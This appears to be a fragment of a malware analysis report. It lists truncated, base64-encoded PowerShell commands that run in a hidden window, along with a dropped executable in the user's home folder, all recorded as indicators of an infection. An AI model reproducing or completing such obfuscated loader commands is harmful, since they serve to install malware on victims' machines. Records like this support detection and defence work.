Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAByAGUAaQB6AG4AZQBpAGcAYgBlAG8AYgBsAGEAaQBrAD0AJwB0AGgAbwB1AGMAcQB1AGkAZQB0AGMAbwBvAHAAJwA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6ACIAUwBlAGMAYABVAFIASQBgAF...
- %HOMEPATH%\972.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAByAGUAaQB6AG4AZQBpAGcAYgBlAG8AYgBsAGEAaQBrAD0AJwB0AGgAbwB1AGMAcQB1AGkAZQB0AGMAbwBvAHAAJwA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6ACIAUwBlAGMAYABVAFIASQBgAF...' (with hidden window)